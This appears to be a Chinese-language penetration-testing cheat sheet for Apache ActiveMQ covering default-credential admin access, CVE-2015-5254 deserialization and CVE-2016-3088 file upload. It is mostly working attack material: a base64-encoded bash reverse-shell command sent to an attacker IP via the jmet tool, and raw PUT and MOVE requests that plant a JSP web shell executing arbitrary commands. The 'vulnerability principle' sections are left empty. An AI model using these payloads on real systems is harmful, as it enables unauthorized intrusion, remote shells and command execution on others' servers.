1.active mq未授权访问
http://ip:port/admin/connections.jsp
弱口令:admin/admin/
2.activemq反序列化(CVE-2015-5254)
操作技巧:
先将反弹shell命令进行序列化和base64加密:
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==
再使用jmet包:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c
{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 目标地址 61616
漏洞原理:
漏洞版本:ActiveMQ < 5.13.0 之前 5.x 版本
3.activemq任意文件写入(CVE-2016-3088)
操作技巧:
先登录后台,然后抓包,使用PUT方法,上传一个shell
PUT /fileserver/shell.jsp HTTP/1.1
Host: 192.168.110.129:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=1nyt11keu8djf1atn2l3dyc3a7
Upgrade-Insecure-Requests: 1
Content-Length: 344
<%
if("luckysec".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
上传显示204,成功,但是该路径下没有解析权限,所以需要使用MOVE方法进行移动到正常的物理路径
http://192.168.110.129:8161/admin/test/systemProperties.jsp查看物理路径
再使用move更改文件路径:
MOVE /fileserver/shell.jsp HTTP/1.1
Destination: file:///opt/activemq/webapps/api/shell.jsp
Host: 192.168.110.129:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=1nyt11keu8djf1atn2l3dyc3a7
Upgrade-Insecure-Requests: 1
访问连接即可,pwd=luckysec&cmd=ls
漏洞原理:
漏洞版本:Apache ActiveMQ 5.x ~ 5.14.0